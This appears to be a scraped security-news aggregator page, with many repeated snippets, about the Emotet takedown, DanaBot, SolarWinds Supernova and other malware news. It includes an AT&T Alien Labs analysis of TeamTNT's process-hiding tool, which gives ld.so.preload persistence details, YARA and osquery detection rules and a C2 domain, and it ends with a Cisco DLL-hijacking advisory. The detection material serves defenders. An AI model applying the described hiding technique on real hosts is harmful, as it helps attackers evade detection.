THE HAGUE, Netherlands (AP) — European and North American cyber cops have joined forces to disrupt what may be the world’s largest network for seeding malware infections, striking a major blow against criminal gangs that have been using it for years to install ransomware in extortion schemes, steal data and engage in financial theft.

Welcome! Follow our cyber reporter, Maggie Miller (@magmill95), and tech team, Chris Mills Rodrigo (@chrisismills) and Rebecca Klar (@rebeccaklar_), for more coverage. STRONG START FOR BIDEN ON CYBER: President Biden and his administration have hit the ground running on cybersecurity during his….

bidenjoe2_01252021getty.png

Welcome! Follow our cyber reporter, Maggie Miller (@magmill95), and tech team, Chris Mills Rodrigo (@chrisismills) and Rebecca Klar (@rebeccaklar_), for more coverage. STRONG START FOR BIDEN ON CYBER: President Biden and his administration have hit the ground running on cybersecurity during his….

20210127-120348-preview.jpg

THE HAGUE, Netherlands (AP) — European and North American cyber cops have joined forces to disrupt what may be the world’s largest network for seeding malware infections, striking a major blow against criminal gangs that have been using it for years to install ransomware in extortion schemes, steal data and engage in financial theft.

The illicit tool called EMOTET was operated as a so-called botnet, software that infects a network of computers and allows them to be remotely controlled, Europol and its judicial sister agency Eurojust said. Police based in Britain, Canada, Germany, Lithuania, the Netherlands, Ukraine and the….

cdafe9459d7d30a4eb821761bbf70be9262a53d6

The illicit tool called EMOTET was operated as a so-called botnet, software that infects a network of computers and allows them to be remotely controlled, Europol and its judicial sister agency Eurojust said. Police based in Britain, Canada, Germany, Lithuania, the Netherlands, Ukraine and the….

Door een gecoördineerde, wereldwijde actie van Europol is Emotet, een van de belangrijkste botnets van de laatste jaren op non-actief gezet. De autoriteiten hebben de controle over de infrastructuur van Emotet overgenomen, zo meldt Europese politieorganisatie.

Sorin Mustaca’s aggregated IT Security News and articles about information security, vulnerabilities, exploits, patches, releases, software, features, hacks, laws, spam, viruses, malware, breaches.

Read the original article: Emotet malware taken down by global law enforcement effort The infamous….

A cracked software site that hides the latest version of the DanaBot Trojan (Source: Proofpoint) Websites advertising pirated and cracked software are being used to deliver an updated version of the DanaBot banking Trojan, which can steal individuals’ online banking credentials, according to….

Sorin Mustaca’s aggregated IT Security News and articles about information security, vulnerabilities, exploits, patches, releases, software, features, hacks, laws, spam, viruses, malware, breaches.

Read the original article: Emotet malware taken down by global law enforcement effort The infamous….

A cracked software site that hides the latest version of the DanaBot Trojan (Source: Proofpoint) Websites advertising pirated and cracked software are being used to deliver an updated version of the DanaBot banking Trojan, which can steal individuals’ online banking credentials, according to….

pirated-software-sites-deliver-fresh-danBanking Trojan Hidden in Pirated Software KeysWebsites advertising pirated and cracked software are being used to deliver an updated version of the DanaBot banking Trojan, which can steal individuals’ online banking credentials, according to Proofpoint.

Door een gecoördineerde, wereldwijde actie van Europol is Emotet, een van de belangrijkste botnets van de laatste jaren op non-actief gezet. De autoriteiten hebben de controle over de infrastructuur van Emotet overgenomen, zo meldt Europese politieorganisatie.

pirated-software-sites-deliver-fresh-danBanking Trojan Hidden in Pirated Software KeysWebsites advertising pirated and cracked software are being used to deliver an updated version of the DanaBot banking Trojan, which can steal individuals’ online banking credentials, according to Proofpoint.

pirated-software-sites-deliver-fresh-danBanking Trojan Hidden in Pirated Software KeysWebsites advertising pirated and cracked software are being used to deliver an updated version of the DanaBot banking Trojan, which can steal individuals’ online banking credentials, according to Proofpoint.

pirated-software-sites-deliver-fresh-danBanking Trojan Hidden in Pirated Software KeysWebsites advertising pirated and cracked software are being used to deliver an updated version of the DanaBot banking Trojan, which can steal individuals’ online banking credentials, according to Proofpoint.

pirated-software-sites-deliver-fresh-danBanking Trojan Hidden in Pirated Software KeysWebsites advertising pirated and cracked software are being used to deliver an updated version of the DanaBot banking Trojan, which can steal individuals’ online banking credentials, according to Proofpoint.

pirated-software-sites-deliver-fresh-danBanking Trojan Hidden in Pirated Software KeysWebsites advertising pirated and cracked software are being used to deliver an updated version of the DanaBot banking Trojan, which can steal individuals’ online banking credentials, according to Proofpoint.

pirated-software-sites-deliver-fresh-danBanking Trojan Hidden in Pirated Software KeysWebsites advertising pirated and cracked software are being used to deliver an updated version of the DanaBot banking Trojan, which can steal individuals’ online banking credentials, according to Proofpoint.

botnet.jpg

The infamous botnet has been disrupted thanks to an international effort across the US, Canada, and several European nations.

FILE – In this file photo dated Wednesday, Oct. 10, 2018, the Europol headquarters building in The Hague, Netherlands. European Europol and North American cyber cops have joined forces Wednesday Jan. 27, 2021, to disrupt what may be the world’s largest network for seeding malware infections,….

Sorin Mustaca’s aggregated IT Security News and articles about information security, vulnerabilities, exploits, patches, releases, software, features, hacks, laws, spam, viruses, malware, breaches.

By Waqas Emotet malware botnet has been taken down by cybersecurity and law enforcement agencies after a joint global operation.

Sorin Mustaca’s aggregated IT Security News and articles about information security, vulnerabilities, exploits, patches, releases, software, features, hacks, laws, spam, viruses, malware, breaches.

Read the original article: Cops Disrupt Emotet, the Internet’s ‘Most Dangerous Malware’ A global….

Sorin Mustaca’s aggregated IT Security News and articles about information security, vulnerabilities, exploits, patches, releases, software, features, hacks, laws, spam, viruses, malware, breaches.

By Waqas Emotet malware botnet has been taken down by cybersecurity and law enforcement agencies after a joint global operation.

Sorin Mustaca’s aggregated IT Security News and articles about information security, vulnerabilities, exploits, patches, releases, software, features, hacks, laws, spam, viruses, malware, breaches.

Read the original article: Cops Disrupt Emotet, the Internet’s ‘Most Dangerous Malware’ A global….

Emotet malware botnet has been taken down by cybersecurity and law enforcement agencies after a joint global operation. “Bye-bye botnets. Huge global operation brings down the world’s most dangerous malware,” read the tweet posted by Europol after taking down Emotet botnet.

flag.png

Original release date: January 27, 2021

CISA has released a malware analysis report on Supernova malware affecting unpatched SolarWinds Orion software. The report contains indicators of compromise (IOCs) and analyzes several malicious artifacts. Supernova is not part of the SolarWinds supply chain attack described in Alert AA20-352A.

CISA encourages users and administrators to review Malware Analysis Report MAR-10319053-1.v1 and the SolarWinds advisory for more information on Supernova.

This product is provided subject to this Notification and this Privacy & Use policy.

flag.png

Original release date: January 27, 2021

CISA has released a malware analysis report on Supernova malware affecting unpatched SolarWinds Orion software. The report contains indicators of compromise (IOCs) and analyzes several malicious artifacts. Supernova is not part of the SolarWinds supply chain attack described in Alert AA20-352A.

CISA encourages users and administrators to review Malware Analysis Report MAR-10319053-1.v1 and the SolarWinds advisory for more information on Supernova.

This product is provided subject to this Notification and this Privacy & Use policy.

flag.png

Original release date: January 27, 2021

CISA has released a malware analysis report on Supernova malware affecting unpatched SolarWinds Orion software. The report contains indicators of compromise (IOCs) and analyzes several malicious artifacts. Supernova is not part of the SolarWinds supply chain attack described in Alert AA20-352A.

CISA encourages users and administrators to review Malware Analysis Report MAR-10319053-1.v1 and the SolarWinds advisory for more information on Supernova.

This product is provided subject to this Notification and this Privacy & Use policy.

Sec_botnet_1229491031.jpg

For more than half a decade, the malware known as Emotet has menaced the internet, growing into one of the largest botnets in the world and targeting victims with data theft and crippling ransomware. Now a sprawling, global police investigation has culminated in Emotet’s takedown and the arrest of….

Sec_botnet_1229491031.jpg

A global operation has taken down the notorious botnet in a blow to cybercriminals worldwide.

Last month’s uncovering of the SolarWinds supply chain attack caused waves of panic and chatter across the U.S. and all over the world. How did such a widely-used and important software get breached? And are even the supposedly best-protected companies (and their customers) still at risk of….

Last month’s uncovering of the SolarWinds supply chain attack caused waves of panic and chatter across the U.S. and all over the world. How did such a widely-used and important software get breached? And are even the supposedly best-protected companies (and their customers) still at risk of….

kelly-sikkema-CjdsgW4cVSU-unsplash-scale

New research from Seqrite has found that in 2020 there were 13,733 malware threats detected every hour. The report showed that of all threats Trojan malware threats were the leaders quarter-on-quarter (QoQ) and year-on-year (YoY).

According to the research out of the 113 million malware detections, the first quarter totalled the highest at 36 million detections. It also showed that in the month of January there were the most malware attacks.

Himanshu Dubey, Director, QuickHeal Security Labs said “with the advent of Covid-19, threat actors have realised how they can capitalize on this new opportunity by banking on the new vulnerabilities that have popped up due to remote working or work from home (WFH).” He continued to say that, “attackers are going to innovate and roll out new ways to target businesses in 2021. It is, therefore, essential for them to invest in robust cybersecurity solutions that can prevent them from being prey to the evolving threat landscape.”

The post More than 13,000 malware threats were detected every hour in 2020 appeared first on IT Security Guru.

Image: Moritz Kindler AT&T Alien Labs security researchers have discovered that the TeamTNT cybercrime group upgraded their Linux crypto-mining with open-source detection evasion capabilities. TeamTNT is mostly known for targeting and compromising Internet-exposed Docker instances for unauthorized Monero (XMR) mining.

Image: Moritz Kindler AT&T Alien Labs security researchers have discovered that the TeamTNT cybercrime group upgraded their Linux crypto-mining with open-source detection evasion capabilities. TeamTNT is mostly known for targeting and compromising Internet-exposed Docker instances for unauthorized Monero (XMR) mining.

Read the original article: Emotet Malware Over the Years: The History of an Active Cyber-Threat [Updated] Malware strains come and go while Internet users become more and more accustomed to online threats being dealt with swiftly by the competent authorities.

THE HAGUE, Netherlands — Law enforcement authorities in several countries have joined forces to disrupt what they call one of the world’s most dangerous pieces of malware, one that allowed criminal gangs to install ransomware and steal data from computer users.

THE HAGUE, Netherlands — Law enforcement authorities in several countries have joined forces to disrupt what they call one of the world’s most dangerous pieces of malware, one that allowed criminal gangs to install ransomware and steal data from computer users.

Strafverfolgungsbehörden aus Deutschland, den Niederlanden, der Ukraine, Litauen, Frankreich sowie England, Kanada und den USA haben gemeinsam die Infrastruktur der Schadsoftware Emotet unter ihre Kontrolle gebracht. Das teilen das Bundeskriminalamts (BKA) und die europäische Polizeibehörde Europol….

nca-jackets-new-site.png

A malware botnet that was used by cybercriminals to infiltrate thousands of companies and millions of computers worldwide has been taken down in an international operation. The National Crime Agency worked with law enforcement partners across Europe and North America for nearly two years to map the….

Strafverfolgungsbehörden aus Deutschland, den Niederlanden, der Ukraine, Litauen, Frankreich sowie England, Kanada und den USA haben gemeinsam die Infrastruktur der Schadsoftware Emotet unter ihre Kontrolle gebracht. Das teilen das Bundeskriminalamts (BKA) und die europäische Polizeibehörde Europol….

A malware botnet that was used by cybercriminals to infiltrate thousands of companies and millions of computers worldwide has been taken down in an international operation. The National Crime Agency worked with law enforcement partners across Europe and North America for nearly two years to map the….

Security Advisory. This security advisory describes one low risk vulnerability.

Description. CWE-427 – Uncontrolled Search Path Element The vulnerability allows a local user to compromise vulnerable system. The vulnerability exists due to incorrect handling of directory search paths at run time. A local user can place a specially crafted .

Hundreds of industrial organizations have apparently received a piece of malware named Sunburst as part of the supply chain attack that hit IT management and monitoring firm SolarWinds last year, Kaspersky’s ICS CERT unit reported on Tuesday.

SolarWinds’ analysis of the attack revealed that up to….

Law enforcement and judicial authorities worldwide have this week disrupted one of most significant botnets of the past decade: EMOTET. Investigators have now taken control of its infrastructure in an international coordinated action. This operation is the result of a collaborative effort between….

New Delhi: With new techniques targeting a completely new setup of the global enterprise, 13,733 malware threats were detected every hour in 2020, with Trojan leading the year-on-year (YoY) and quarter-on-quarter (QoQ) charts followed by other

solutions brand by Quick Heal Technologies , out of the….

Protection Phone Site Protection Phone Site or Protection-phone1.site is a questionable website that can access your Calendar app on iPhone/Mac/iPad devices and start showing fake alert messages. For the sake of your device security, you should be skeptical about the. by

Notification-fix1.best Virus Notification-fix1.

has identified a new tool from the TeamTNT adversary group, which has been previously observed targeting exposed Docker infrastructure for cryptocurrency mining purposes and credential theft. The group is using a new detection evasion tool, copied from open source repositories.

malware-red-sphere-open-graph.jpg

Executive Summary

AT&T Alien Labs™ has identified a new tool from the TeamTNT adversary group, which has been previously observed targeting exposed Docker infrastructure for cryptocurrency mining purposes and credential theft. The group is using a new detection evasion tool, copied from open source repositories.

The purpose of this blog is to share new technical intelligence and provide detection and analysis options for defenders.

Background

AT&T Alien Labs previously reported on TeamTNT cryptomining malware using a new memory loader based on Ezuri and written in GOlang. Since then, TeamTNT has added another tool to their list of capabilities.

Analysis

The objective of the new tool is to hide the malicious process from process information programs such as `ps` and `lsof`, effectively acting as a defense evasion technique.

The tool, named libprocesshider, is an open source tool from 2014 located on Github, described as “hide a process under Linux using the ld preloader.” Preloading allows the system to load a custom shared library before other system libraries are loaded. If the custom shared library exports a function with the same signature of one located in the system libraries, the custom version will override it.

The tool implements the function readdir() which is being used by processes such as `ps` to read the /proc directory to find running processes and to modify the return value in case there is a match between the processes found and the process needed to hide.

The new tool arrives within a base64 encoded script hidden in the TeamTNT cryptominer binary or ircbot (figure 1):

base64 script

Figure 1. base64 encoded script, via Alien Labs analysis.

Upon binary execution, the bash script will run through a multitude of tasks. Specifically, the script will:

Modify the network DNS configuration.

Set persistence through systemd.

Drop and activate the new tool as service.

Download the latest IRC bot configuration.

Clear evidence of activities to complicate potential defender actions.

After decoding, we can observe the bash script functionality and how some malicious activity occurs before the shared library is created (figure 2):

bash script functionality

Figure 2. Decoded bash script, via Alien Labs analysis.

The new tool is first dropped as a hidden tar file on disk, the script decompresses it, writes it to ‘/usr/local/lib/systemhealt.so’, and then adds it preload via ‘/etc/ld.so.preload’. This will be used by the system to preload the file before other system libraries, allowing the attacker to override some common functions (figure 3/4).

preload file 1

preload file 2

Figure 3/4. bash script features, via Alien Labs analysis.

The main purpose of the tool is to hide the TeamTNT bot from process viewer tools, which use the file ‘/usr/bin/sbin’ as you can see in Figure 3 and 4 (SETUP_IRCBOT function).

As final step, the malware will remove traces by deleting bash history:

deleting bash history

Figure 5. bash script cleanup, via Alien Labs analysis.

Conclusion

Through the use of libprocesshider, TeamTNT once again expands their capabilities based on the available open source tools. While the new functionality of libprocesshider is to evade detection and other basic functions, it acts as an indicator to consider when hunting for malicious activity on the host level. Alien Labs will continue to monitor the threat and report on any noteworthy activity.

Appendix A. Detection Methods

The following associated detection methods are in use by Alien Labs. They can be used by readers to tune or deploy detections in their own environments or for aiding additional research.

SURICATA IDS SIGNATURES

AV TROJAN TeamTNT CoinMiner Payload Download to clean up other Coinminers

AV TROJAN TeamTNT Mining Worm Credential Exfiltration

AV TROJAN TeamTNT CoinMiner Downloader

ET TROJAN Observed TrojanSpy.SH.HADGLIDER.A Exfil Domain in DNS Query

 

YARA RULES

rule teamTNT_hideproc

{

meta:

sha256 = “02cde4109a12acb499953aa8c79917455b9f49837c7c1dbb13cbcf67e86a1555”

strings:

$code1 = {48 8B 15 ?? ?? 00 00 48 8B 85 ?? ?? FF FF 48 89 C7 FF D2 48 89 [2-5] 48 [3-6] 00 74 ?? 48 8D 8D F0 FD FF FF 48 8B 85 ?? FD FF FF BA 00 01 00 00 48 89 CE 48 89 C7 E8 ?? FD FF FF 85 C0 74 ?? 48 8D 85 F0 FD FF FF 48 8D 35 ?? ?? 00 00 48 89 C7 E8 ?? ?? FF FF 85 C0 75 ?? 48 8B [2-5] 48 8D 50 13 48 8D 85 F0 FE FF FF 48 89 C6 48 89 D7 E8 ?? ?? FF FF 85 C0 74 22 48 8B 15 ?? ?? 00 00 48 8D 85 F0 FE FF FF 48 89 D6 48 89 C7 E8 ?? ?? FF FF 85 C0 }

$s1 = “readdir64”

$s2 = “dlsym”

$s3 = “_ITM_deregisterTMCloneTable”

$s4 = “frame_dummy”

condition:

uint16(0) == 0x457f and

filesize < 25000 and

all of them

}

 

 

AGENT SIGNATURES

“detection_suspicious_ld_preload_environment_variable”: {“platform”: “linux”, “description”: “Detects usage of the ld_preload env variable “, “query”: “SELECT process_envs.pid as source_process_id, process_envs.key as environment_variable_key, process_envs.value as environment_variable_value, processes.name as source_process, processes.path as file_path, processes.cmdline as source_process_commandline, processes.cwd as current_working_directory, ‘T1055’ as event_attack_id, ‘Process Injection’ as event_attack_technique, ‘Defense Evasion, Privilege Escalation’ as event_attack_tactic FROM process_envs join processes USING (pid) WHERE key = ‘LD_PRELOAD’;”, “interval”: “60”,”removed”: “false”}

 

Appendix B. Associated Indicators (IOCs)

The following technical indicators are associated with the reported intelligence. A list of indicators is also available in the OTX Pulse. Please note, the pulse may include other activities related but out of the scope of the blog.

TYPE

INDICATOR

DESCRIPTION

SHA256

73dec430b98ade79485f76d405c7a9b325df7492b4f97985499a46701553e34a

ezuri packed, TeamTNT CryptoMiner

SHA256

cb013be7b5269c035495222198ec708c026c8db838031af60fd0bd984f34226f

TeamTNT CryptoMiner

SHA256

02cde4109a12acb499953aa8c79917455b9f49837c7c1dbb13cbcf67e86a1555

TeanTNT hideprocess (systemhealt.so)

SHA256

b666cd08b065132235303727f2d77997a30355ae0e5b557cd08d41c9ade7622d

ziggy_spread – TeamTNT IRC bot

Domain

kaiserfranz[.]cc

C2 Server

 

Feedback

AT&T Alien Labs welcomes feedback about this blog. Please contact the Alien Labs blog author or contact labs@alienvault.com. 

fblike20.png googleplus20.png linkedin20.png twitter20.png email20.png rss20.png 

malware-red-sphere-open-graph.jpg

Executive Summary

AT&T Alien Labs™ has identified a new tool from the TeamTNT adversary group, which has been previously observed targeting exposed Docker infrastructure for cryptocurrency mining purposes and credential theft. The group is using a new detection evasion tool, copied from open source repositories.

The purpose of this blog is to share new technical intelligence and provide detection and analysis options for defenders.

Background

AT&T Alien Labs previously reported on TeamTNT cryptomining malware using a new memory loader based on Ezuri and written in GOlang. Since then, TeamTNT has added another tool to their list of capabilities.

Analysis

The objective of the new tool is to hide the malicious process from process information programs such as `ps` and `lsof`, effectively acting as a defense evasion technique.

The tool, named libprocesshider, is an open source tool from 2014 located on Github, described as “hide a…

Ofer Caspi

Posted by:

Ofer Caspi

Read full post

fblike20.png googleplus20.png pinterest20.png twitter20.png email20.png rss20.png  

whatsapp-messages-wormable-malware.jpg

“Download This application and Win Mobile Phone”, reads the message attempting to trick users into downloading a fake Huawei app

The post Wormable Android malware spreads via WhatsApp messages appeared first on WeLiveSecurity

CNR-800x400_Crypto-Mining.jpg

Skyrocketing Bitcoin Prices See Resurgence in Mining Malware

As the price of cryptocurrency, Bitcoin, continues to push to record heights, so have we seen a rise in crypto-mining malware. When Bitcoin values decreased in recent years, these types of illicit miners slipped off the radar, but it comes as no surprise that the authors are hoping to profit over the latest price increase. Researchers have even identified multiple forms of crypto-miners, from browser-based applications to completely fileless script miners, which are used for a variety of system configurations.

Major Increase in Malicious Vaccine-related Domains

In the month following the release of the first COVID-19 vaccine for public availability, the number of domains with ‘vaccine’ in the title increased 94.8% over the previous month. As with the popularity of malicious COVID-related domains being registered in March of last year, cybercriminals are taking advantage of the pandemic’s hold over the general public in order to profit. With over 2,000 new domains with COVID-related keywords being created, the real worry is how to find accurate and reliable information amongst the surge of illegitimate sites.

Millions of Nitro PDF User Records Leaked

A database containing over 77 million user records belonging to Nitro PDF have been found available for free on a Dark Web marketplace. The leaked data was initially part of the October data breach that Nitro confirmed and was bundled for auction with a high price tag. Now, several months later, a member of known hacking group, ShinyHunters, has released access to the download link for a mere $3.

Scottish EPA Falls Victim to Ransomware Attack

Officials for the Scottish Environmental Protection Agency (SEPA) has confirmed that data stolen in a ransomware attack last month has been posted for sale on the Dark Web by the group responsible for the Conti ransomware variant. While it is still unclear on how the attackers gained access to the agency’s systems, many of the infected systems are still non-operational and have no estimated time for full recovery.

Hackers Leak Nearly 2 Million Pixlr Records

In the past couple days, the ShinyHunters hacking group has posted a database containing nearly 2 million user records for the Pixlr photo editing application. The group claims they stole the database during another data breach at another photo site, 123rf; both of which are owned by Inmagine. Though Pixlr has yet to confirm the breach, users should change their passwords and make any update to other sites that may share the same credentials.

The post Cyber News Rundown: Crypto-Mining Malware Resurges appeared first on Webroot Blog.

computer-xps-2L-0vnCnzcU-unsplash.jpg

By Nick Kael, CTO at EricomThe browser is the targetLast week, Google’s Project Zero exploit research team published reports detailing a sophisticated cyber operation that targeted vulnerabilities in Chrome and Windows, installing malware to exploit weaknesses in the browser and operating system to compromise endpoints. Some of the advanced malware targeted vulnerabilities that were, at the time, unknown to Google and Microsoft. These included:CVE-2020-6418—Chrome Vulnerability in TurboFanCV…

twitterbitacora.png

Fecha de publicación: 19/01/2021

El Departamento de Educación del Reino Unido ha informado que parte de los más de 800.000 ordenadores portátiles cedidos a escuelas británicas, debido a la situación ocasionada por la pandemia, contenían malware.

Esta infección fue descubierta gracias a algunos profesores de la escuela Brandford, tras publicar los archivos sospechosos en un foro online. El malware en cuestión es el conocido gusano Gamarue, identificado por Microsoft en 2012 y cuyo propósito es instalar software espía, pudiendo recopilar datos de navegación, personales o bancarios.

Actualmente, el Departamento de Educación investiga lo ocurrido con urgencia de la mano de expertos y la empresa Geo, fabricante de los equipos. Por el momento, se desconoce el alcance real y se recomienda a las escuelas que revisen sus redes, reinicien los equipos en modo seguro y realicen análisis antivirus.

19/01/2021

Etiquetas:
#CiberCOVID19, Administración pública, Cibercrimen, Ciberespionaje, Herramienta, Malware, Otras infraestructuras críticas

Referencias:

ReferenciaMedioURLFechaExternoIdioma destinoIdioma contenido Malware found on laptops given out by governmentbbc.comhttps://www.bbc.com/news/technology-5574995919/01/2021sienen UK govt gives malware infected laptops to vulnerable studentsbleepingcomputer.comhttps://www.bleepingcomputer.com/news/security/uk-govt-gives-malware-infected-laptops-to-vulnerable-students/21/01/2021sienen UK Government Distributes Malware-Ridden Laptops to Studentstechnadu.comhttps://www.technadu.com/uk-government-distributes-malware-ridden-laptops-students/242704/22/01/2021sienen

Publication date: 01/19/2021

The UK Department for Education has reported that some of the more than 800.000 laptops, given to UK schools because of the pandemic situation, contained malware.

The infection was discovered by teachers at Brandford School after they posted the suspicious files on an online forum. The malware in question is the well-known Gamarue worm, which was identified by Microsoft in 2012 and whose purpose is to install spyware which may collect browsing, personal or banking data.

Currently, the Department of Education is urgently investigating the incident with the help of experts and the company Geo, the manufacturer of the equipment. So far, the actual scope of the problem is unknown and schools are advised to check their networks, restart computers in safe mode and carry out anti-virus scans.

01/19/2021

Tags:
#CyberCOVID19, Cybercrime, Cyberespionage, Malware, Other critical infrastructures, Public administration, Tool

References:

ReferenciaMedioURLFechaExternoIdioma destinoIdioma contenido Malware found on laptops given out by governmentbbc.comhttps://www.bbc.com/news/technology-5574995919/01/2021sienen UK govt gives malware infected laptops to vulnerable studentsbleepingcomputer.comhttps://www.bleepingcomputer.com/news/security/uk-govt-gives-malware-infected-laptops-to-vulnerable-students/21/01/2021sienen UK Government Distributes Malware-Ridden Laptops to Studentstechnadu.comhttps://www.technadu.com/uk-government-distributes-malware-ridden-laptops-students/242704/22/01/2021sienen

Den taiwanske leverandør QNAP af NAS-enheder har udsendt en advisory, hvor kunderne advares mod et nyt stykke malware, der er målrettet mod NAS-enheder. Malwaren med navnet Dovecat er designet til at misbruge NAS-ressourcer mhp. at udvinde kryptovaluta. Det skriver Security Affairs m.fl.

Malware er målrettet mod QNAP NAS-enheder, der er eksponeret online, og som har svage adgangskoder.

Sprog
Dansk

Læs mere om QNAP advarer brugere om malware

—–BEGIN PGP SIGNED MESSAGE—–
Hash: SHA256

===========================================================================
AUSCERT External Security Bulletin Redistribution

ESB-2021.0245
Cisco Advanced Malware Protection for Endpoints and Immunet
for Windows DLL Hijacking Vulnerability
21 January 2021

===========================================================================

AusCERT Security Bulletin Summary
———————————

Product: Cisco Advanced Malware Protection for Endpoints and Immunet for Windows
Publisher: Cisco Systems
Operating System: Windows
Impact/Access: Execute Arbitrary Code/Commands — Existing Account
Resolution: Patch/Upgrade
CVE Names: CVE-2021-1280

Original Bulletin:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-amp-imm-dll-5PAZ3hRV

– ————————–BEGIN INCLUDED TEXT——————–

Cisco Advanced Malware Protection for Endpoints and Immunet for Windows DLL
Hijacking Vulnerability

Priority: High
Advisory ID: cisco-sa-amp-imm-dll-5PAZ3hRV
First Published: 2021 January 20 16:00 GMT
Version 1.0: Final
Workarounds: No workarounds available
Cisco Bug IDs: CSCvv53346
CVE Names: CVE-2021-1280
CWEs: CWE-427

Summary

o A vulnerability in the loading mechanism of specific DLLs of Cisco Advanced
Malware Protection (AMP) for Endpoints for Windows and Immunet for Windows
could allow an authenticated, local attacker to perform a DLL hijacking
attack. To exploit this vulnerability, the attacker would need valid
credentials on the Windows system.

This vulnerability is due to incorrect handling of directory search paths
at run time. An attacker could exploit this vulnerability by placing a
malicious DLL file on the targeted system. This file will execute when the
vulnerable application launches. A successful exploit could allow the
attacker to execute arbitrary code on the targeted system with SYSTEM
privileges.

Cisco has released software updates that address this vulnerability. There
are no workarounds that address this vulnerability.

This advisory is available at the following link:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-amp-imm-dll-5PAZ3hRV

Affected Products

o Vulnerable Products

This vulnerability affects the following products:

All Cisco AMP for Endpoints for Windows releases earlier than Release
7.3.3
All Immunet for Windows releases earlier than Release 7.3.12

Products Confirmed Not Vulnerable

Only products listed in the Vulnerable Products section of this advisory
are known to be affected by this vulnerability.

Cisco has confirmed that this vulnerability does not affect the following
Cisco products:

AMP for Endpoints for Linux
AMP for Endpoints for Mac

Workarounds

o There are no workarounds that address this vulnerability.

Fixed Software

o Cisco has released free software updates that address the vulnerability
described in this advisory. Customers may only install and expect support
for software versions and feature sets for which they have purchased a
license. By installing, downloading, accessing, or otherwise using such
software upgrades, customers agree to follow the terms of the Cisco
software license:
https://www.cisco.com/c/en/us/products/end-user-license-agreement.html

Additionally, customers may only download software for which they have a
valid license, procured from Cisco directly, or through a Cisco authorized
reseller or partner. In most cases this will be a maintenance upgrade to
software that was previously purchased. Free security software updates do
not entitle customers to a new software license, additional software
feature sets, or major revision upgrades.

When considering software upgrades , customers are advised to regularly
consult the advisories for Cisco products, which are available from the
Cisco Security Advisories page , to determine exposure and a complete
upgrade solution.

In all cases, customers should ensure that the devices to be upgraded
contain sufficient memory and confirm that current hardware and software
configurations will continue to be supported properly by the new release.
If the information is not clear, customers are advised to contact the Cisco
Technical Assistance Center (TAC) or their contracted maintenance
providers.

Customers Without Service Contracts

Customers who purchase directly from Cisco but do not hold a Cisco service
contract and customers who make purchases through third-party vendors but
are unsuccessful in obtaining fixed software through their point of sale
should obtain upgrades by contacting the Cisco TAC: https://www.cisco.com/c
/en/us/support/web/tsd-cisco-worldwide-contacts.html

Customers should have the product serial number available and be prepared
to provide the URL of this advisory as evidence of entitlement to a free
upgrade.

Fixed Releases

Cisco fixed this vulnerability in the following releases:

Cisco AMP for Endpoints for Windows releases 7.3.3 and later
Immunet for Windows releases 7.3.12 and later

Exploitation and Public Announcements

o The Cisco Product Security Incident Response Team (PSIRT) is not aware of
any malicious use of the vulnerability that is described in this advisory.

Source

o Cisco would like to thank Hou JingYi of Qihoo 360 CERT for initially
reporting this vulnerability. Cisco would also like to thank Kyriakos
Economou and Tom Wilson of ZeroPeril Ltd. for their report on this
vulnerability.

Cisco Security Vulnerability Policy

o To learn about Cisco security vulnerability disclosure policies and
publications, see the Security Vulnerability Policy . This document also
contains instructions for obtaining fixed software and receiving security
vulnerability information from Cisco.

URL

o https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-amp-imm-dll-5PAZ3hRV

Revision History

o +———-+—————————+———-+——–+————–+
| Version | Description | Section | Status | Date |
+———-+—————————+———-+——–+————–+
| 1.0 | Initial public release. | – | Final | 2021-JAN-20 |
+———-+—————————+———-+——–+————–+

– ————————–END INCLUDED TEXT——————–

You have received this e-mail bulletin as a result of your organisation’s
registration with AusCERT. The mailing list you are subscribed to is
maintained within your organisation, so if you do not wish to continue
receiving these bulletins you should contact your local IT manager. If
you do not know who that is, please send an email to auscert@auscert.org.au
and we will forward your request to the appropriate person.

NOTE: Third Party Rights
This security bulletin is provided as a service to AusCERT’s members. As
AusCERT did not write the document quoted above, AusCERT has had no control
over its content. The decision to follow or act on information or advice
contained in this security bulletin is the responsibility of each user or
organisation, and should be considered in accordance with your organisation’s
site policies and procedures. AusCERT takes no responsibility for consequences
which may arise from following or acting on information or advice contained in
this security bulletin.

NOTE: This is only the original release of the security bulletin. It may
not be updated when updates to the original are made. If downloading at
a later date, it is recommended that the bulletin is retrieved directly
from the author’s website to ensure that the information is still current.

Contact information for the authors of the original document is included
in the Security Bulletin above. If you have any questions or need further
information, please contact them directly.

Previous advisories and external security bulletins can be retrieved from:

https://www.auscert.org.au/bulletins/

===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072

Internet Email: auscert@auscert.org.au
Facsimile: (07) 3365 7031
Telephone: (07) 3365 4417 (International: +61 7 3365 4417)
AusCERT personnel answer during Queensland business hours
which are GMT+10:00 (AEST).
On call after hours for member emergencies only.
===========================================================================
—–BEGIN PGP SIGNATURE—–
Comment: http://www.auscert.org.au/render.html?it=1967

iQIVAwUBYAkWpONLKJtyKPYoAQj2BRAAm2FCLHUFvWdEsJe7Mif7TEcVME6EBnBG
rFu/eSssvFHtxI37+ND5s1GXLIJsDiB5kELXITJhbIGV4oJNs4Is67MmKJSOIubZ
XIF70TbcmlJJxMTbop8Wg3Z87GiQiPcz/w027/tR1tA/QDVQz1nL/WcjGXRbLmau
5ATXDfS4fpJF5LI/db9upNcqMp/yhVrEel3aWCm4oCSt5AoDECuHSxJ7b1Loq749
6IbYkWJHB0Ry8s5ZiPfzq++aNrW3EsLxru5nxzdQCpN8/8T9CC8noOMK+nq0H7t8
4MOGrqD6honule1KrE26mofrLb9zjz9dugTqcVZz4Wm+66bigHYdOqsb3sBb8s4P
o9oOhONcgJr0Qy7Oa2kFQPuXR9zJCadXGEQu4Azerr/zUiDRTwBrtRoOF7/gHUoI
ZvbeD8Rbi867EUYAbmLy2zfj9ZwxOdOYmR10zIH4Dlgxor5K7enCiovSjFnHR0Ez
18v6Ayc1mzAYSsYCCQs/HAtYm4m98XeUfATArRaK2utWHQaXI7P94InCipNHZop6
6LS/ajAW0AEE7F76fK4uEFX2Yj/yeeHHZZLXBNJe7855kwOtD7bwGZ3rrGwfR/l7
rx5wnoOv3N6NKnhDhgqQBdhejV5JhYHxEIDP/SkYf3lt9I5dWReC1pH4s59C6MRO
S/o/N5AFs58=
=tCkb
—–END PGP SIGNATURE—–

